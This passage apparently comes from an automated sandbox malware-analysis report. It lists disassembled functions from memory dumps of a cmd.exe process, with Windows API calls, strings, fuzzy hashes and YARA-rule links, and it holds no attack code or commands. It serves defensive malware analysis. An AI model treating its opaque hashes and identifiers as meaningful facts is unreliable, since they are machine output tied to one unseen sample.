                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1535828850-0
                                                                                                                                            • Opcode ID: 61e8a35cb8f42e0f0cdbbf35a4420ee5b760c1c0ea2dd53d5aa5f26eaef76978
                                                                                                                                            • Instruction ID: ed8854295a16ba414537ff6b73a92ef7182bd1050524a8a2576e6eeeb6b7f434
                                                                                                                                            • Opcode Fuzzy Hash: 61e8a35cb8f42e0f0cdbbf35a4420ee5b760c1c0ea2dd53d5aa5f26eaef76978
                                                                                                                                            • Instruction Fuzzy Hash: 47C1D271A10215CFDB68DF18D884BA9B7B1FF88305F5581AED80A9B391EB309E95CF44
                                                                                                                                            Function 002694E0 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00269527
                                                                                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0026952F
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 002695B5
                                                                                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002695BD
                                                                                                                                              • Part of subcall function 00268C50: longjmp.MSVCRT(00280A70,00000001,0024206C,00245E68,?,?,?,?,00000000), ref: 00268CC4
                                                                                                                                              • Part of subcall function 00268C50: memset.MSVCRT ref: 00268D1D
                                                                                                                                              • Part of subcall function 00268C50: memset.MSVCRT ref: 00268D45
                                                                                                                                              • Part of subcall function 00268C50: memset.MSVCRT ref: 00268D6D
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002695CC
                                                                                                                                              • Part of subcall function 0024A16C: _close.MSVCRT ref: 0024A19B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 288106245-0
                                                                                                                                            • Opcode ID: 264e6b8d11762173ead8d9c1255f991b71631c1468f860e13b34a9de77d372f8
                                                                                                                                            • Instruction ID: 17dd265879eef5417424f007774706a1a76d15950618e4df8aa578f24e9cdd12
                                                                                                                                            • Opcode Fuzzy Hash: 264e6b8d11762173ead8d9c1255f991b71631c1468f860e13b34a9de77d372f8
                                                                                                                                            • Instruction Fuzzy Hash: BD31CF75A20205AFEF199F74E849BAE77ADEB44321F20412AF502D6280DF75DDD18B50
                                                                                                                                            Function 00254CA0 Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00254CC2
                                                                                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00268FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00254CCA
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00260BFC
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00260C48
                                                                                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00260C71
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3588551418-0
                                                                                                                                            • Opcode ID: e30a12a6d0638adf5593d282f386fd03a26388e33a3fadd728841abe0d8990be
                                                                                                                                            • Instruction ID: 1d7bc1f40617c0255424b32ce92b7ead8b9bd68f8c73be41e917672c5dbf1e4d
                                                                                                                                            • Opcode Fuzzy Hash: e30a12a6d0638adf5593d282f386fd03a26388e33a3fadd728841abe0d8990be
                                                                                                                                            • Instruction Fuzzy Hash: E631D131631105AFEB1CAF24EC89A7FB769EF8530AB20442AE806C3250DB75DCE0DB55
                                                                                                                                            Function 002570F5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00257122
                                                                                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00257131
                                                                                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0025713A
                                                                                                                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00257143
                                                                                                                                            • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00257158
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                            • Opcode ID: 89c5ed6dc31c94e82da299eb9a96005d853e70a930646fa113784a8fdd02aa98
                                                                                                                                            • Instruction ID: cd4ff5a7f792afd45a317baaa8957a8da50b55bfac267e672a3b7adacfbce1e3
                                                                                                                                            • Opcode Fuzzy Hash: 89c5ed6dc31c94e82da299eb9a96005d853e70a930646fa113784a8fdd02aa98
                                                                                                                                            • Instruction Fuzzy Hash: 15116675D05208ABDF10CFB8EA4C69EB7F5FF08311F618866D802E7264EA709B008B02
                                                                                                                                            Function 00264840 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,002587E5,00000000,?,00244A0A), ref: 0026484A
                                                                                                                                              • Part of subcall function 0024DD98: _get_osfhandle.MSVCRT ref: 0024DDA3
                                                                                                                                              • Part of subcall function 0024DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0025C050), ref: 0024DDAD
                                                                                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,002587E5,00000000,?,00244A0A), ref: 00264879
                                                                                                                                            • _getch.MSVCRT ref: 0026487F
                                                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,002587E5,00000000,?,00244A0A), ref: 00264897
                                                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,002587E5,00000000,?,00244A0A), ref: 002648AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 491502236-0
                                                                                                                                            • Opcode ID: 24946be60109dbb51b0522fe81c8ba04926428707d6cf8a948bc7f36a561283d
                                                                                                                                            • Instruction ID: 7429aa9cf69727acff22a74e1c9fe2be26ccfaea1d95c04c789f8ad5817801eb
                                                                                                                                            • Opcode Fuzzy Hash: 24946be60109dbb51b0522fe81c8ba04926428707d6cf8a948bc7f36a561283d
                                                                                                                                            • Instruction Fuzzy Hash: 0A01DF36026351EFEB18BBA0FC0EB5E3B64DF01720F10011AF84A961A0DFB199E48F91
                                                                                                                                            Function 03BFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • RTL: Re-Waiting, xrefs: 03C4031E
                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03C402E7
                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03C402BD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                            • Opcode ID: 25d1331e4765eaf166edbdc635935eec3b88502dbbcec04df6f8d55ed89799e6
                                                                                                                                            • Instruction ID: b74640b9fc1d7a83c26eb66437055ff53810a78d9a5504db0e5a7b40142d4baf
                                                                                                                                            • Opcode Fuzzy Hash: 25d1331e4765eaf166edbdc635935eec3b88502dbbcec04df6f8d55ed89799e6
                                                                                                                                            • Instruction Fuzzy Hash: DCE1AD746047419FD725CF28C884B2AF7E0FB85718F184AADE6A5CB2E1D774E948CB42
                                                                                                                                            Function 00246488 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00246513: memset.MSVCRT ref: 00246593
                                                                                                                                              • Part of subcall function 0024DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00248E86,00248E5A,00000000), ref: 0024DC98
                                                                                                                                              • Part of subcall function 0024DC60: RtlFreeHeap.NTDLL ref: 0024DC9F
                                                                                                                                            • memset.MSVCRT ref: 0025A097
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heapmemset$FreeProcess
                                                                                                                                            • String ID: *.*
                                                                                                                                            • API String ID: 1291122668-438819550
                                                                                                                                            • Opcode ID: 56ab45543c652ee8ca45ed0b34aaf4d6fe5588960a1a80d018b55f6f014844bb
                                                                                                                                            • Instruction ID: 28f53b0be2f656e2a29ff04690a0ae0bef300927523b08a594110ac8940ae5fc
                                                                                                                                            • Opcode Fuzzy Hash: 56ab45543c652ee8ca45ed0b34aaf4d6fe5588960a1a80d018b55f6f014844bb
                                                                                                                                            • Instruction Fuzzy Hash: 07B1E271D20206AFCF28DFA4C886AAEB7B1EF58701F148159EC09AB241D731DD65CF95
                                                                                                                                            Function 00265948 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 252registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00265997
                                                                                                                                              • Part of subcall function 0024AB7F: iswspace.MSVCRT ref: 0024AB8D
                                                                                                                                              • Part of subcall function 0024AB7F: wcschr.MSVCRT ref: 0024AB9E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Enumiswspacewcschr
                                                                                                                                            • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                            • API String ID: 3493821229-3301834661
                                                                                                                                            • Opcode ID: b20b6ab1973a8bdd999c4457f62a1ea89c2ecfceb66c721deeab1ec2432587f0
                                                                                                                                            • Instruction ID: 553dbbd4f22ba8fd7a765ac3b6a1b0d8ea5d03b81a97d465a751e48e27f9f688
                                                                                                                                            • Opcode Fuzzy Hash: b20b6ab1973a8bdd999c4457f62a1ea89c2ecfceb66c721deeab1ec2432587f0
                                                                                                                                            • Instruction Fuzzy Hash: 7A816C75E2062A5BDB28DF68CCC5BFA7379EF90704F1441A9E80A97140EA708ED18F90
                                                                                                                                            Function 0024CCD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                                                                                            • API String ID: 0-1704545398
                                                                                                                                            • Opcode ID: 083bdcc6cc81f018422cbb98f06e90d207c9a97bd17e0bbe25756f5d2d6318b3
                                                                                                                                            • Instruction ID: 96c16e28f21d1170b4cd981968357a4703918c85c333254c14fa2693cd7f89d0
                                                                                                                                            • Opcode Fuzzy Hash: 083bdcc6cc81f018422cbb98f06e90d207c9a97bd17e0bbe25756f5d2d6318b3
                                                                                                                                            • Instruction Fuzzy Hash: D2512935B3210386DBACBF6CA85977A7662EB50314F654136D8068B291EBF19CB0CB91
                                                                                                                                            Function 03C0BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • RTL: Re-Waiting, xrefs: 03C47BAC
                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03C47B7F
                                                                                                                                            • RTL: Resource at %p, xrefs: 03C47B8E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                            • Opcode ID: 7dc76032463d7d2427788b927b3a5b8cb12458d375fc90d9b2ee93b4a9640208
                                                                                                                                            • Instruction ID: 44b83532b6b25e66c3f07a3df5e9e7e9a35b71d2c81db692b1cd61e94638a987
                                                                                                                                            • Opcode Fuzzy Hash: 7dc76032463d7d2427788b927b3a5b8cb12458d375fc90d9b2ee93b4a9640208
                                                                                                                                            • Instruction Fuzzy Hash: 974106397047429FC724DE25CC40B6AB7E9EF89710F040A6DF96ADF680DB70E9458B91
                                                                                                                                            Function 03C0B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03C4728C
                                                                                                                                            Strings
                                                                                                                                            • RTL: Re-Waiting, xrefs: 03C472C1
                                                                                                                                            • RTL: Resource at %p, xrefs: 03C472A3
                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03C47294
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                            • Opcode ID: 83fbfd4a088c6940f6a8c6004cea23e3bc6ddc834cccc5e755026f86085ba07d
                                                                                                                                            • Instruction ID: 3de304f1cb437da52af8a5ae38c19cd6154cc49ca567ab13c325e84fd38ec25d
                                                                                                                                            • Opcode Fuzzy Hash: 83fbfd4a088c6940f6a8c6004cea23e3bc6ddc834cccc5e755026f86085ba07d
                                                                                                                                            • Instruction Fuzzy Hash: B741FD75700742ABC720DE65CC41B6AB7A9FB84710F140629F865EF280DB21F9929BD1
                                                                                                                                            Function 03C82300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                            • Opcode ID: 44ed0d62170dd9e059d191d0ccd5afca994564599e9be9cd8f97a3f924e94c46
                                                                                                                                            • Instruction ID: 8efbba81ef623c817705dea88f3a43ed59bbf064209bd6940baaff093b828c2d
                                                                                                                                            • Opcode Fuzzy Hash: 44ed0d62170dd9e059d191d0ccd5afca994564599e9be9cd8f97a3f924e94c46
                                                                                                                                            • Instruction Fuzzy Hash: 9A319A76A002199FCB20EF29CC54BEEB7FCFF44614F854556E849E7200EB309B449B60
                                                                                                                                            Function 00265166 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0025727B: __iob_func.MSVCRT ref: 00257280
                                                                                                                                            • fprintf.MSVCRT ref: 00265182
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __iob_funcfprintf
                                                                                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                            • API String ID: 620453056-2781220306
                                                                                                                                            • Opcode ID: 27bec9702eccce946741fbca5461a31417ac3bb1a54713647a690827f065cf57
                                                                                                                                            • Instruction ID: 837c8dde1d8b5882f05c6adf97c726f27baa5605c785d43d0c591394bb458dcd
                                                                                                                                            • Opcode Fuzzy Hash: 27bec9702eccce946741fbca5461a31417ac3bb1a54713647a690827f065cf57
                                                                                                                                            • Instruction Fuzzy Hash: CE01CB37A30A239AC7386F5CB806A636310DAD2324B14056BEC5E93180FAA05DE28550
                                                                                                                                            Function 00263500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 0026351B
                                                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 0026352C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                                                                                            • API String ID: 1646373207-582119455
                                                                                                                                            • Opcode ID: 4ad890d36bc3a1855ce319e6d2599f93cc39a408a36e5aa8151c6184f369bf33
                                                                                                                                            • Instruction ID: 8051eabc5d79e025b04a5710bc581c2cf8784f9092ad347cf6e36497d58c9426
                                                                                                                                            • Opcode Fuzzy Hash: 4ad890d36bc3a1855ce319e6d2599f93cc39a408a36e5aa8151c6184f369bf33
                                                                                                                                            • Instruction Fuzzy Hash: 9FE09239A122318B9F25DF34BD0C55A3794A749B613460052E80AE7211DB608D918FD1
                                                                                                                                            Function 002638F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 002638FB
                                                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00263907
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                            • API String ID: 1646373207-919018592
                                                                                                                                            • Opcode ID: fa9f2fc1f87b8b4a2044d613b788385bf297f86011acaac4aad30776d0d14bc8
                                                                                                                                            • Instruction ID: 8582ae98a151ad146dd5dc6a9f3be5add9ba15a8b9998f70a34e9f81ad6ec993
                                                                                                                                            • Opcode Fuzzy Hash: fa9f2fc1f87b8b4a2044d613b788385bf297f86011acaac4aad30776d0d14bc8
                                                                                                                                            • Instruction Fuzzy Hash: 47E08C36542229BB8B211FA1EC0DC8ABF29EB457A17000022F90882120CE728920CFA1
                                                                                                                                            Function 00251CD5 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D3A
                                                                                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D44
                                                                                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D57
                                                                                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D61
                                                                                                                                            Memory Dump Source
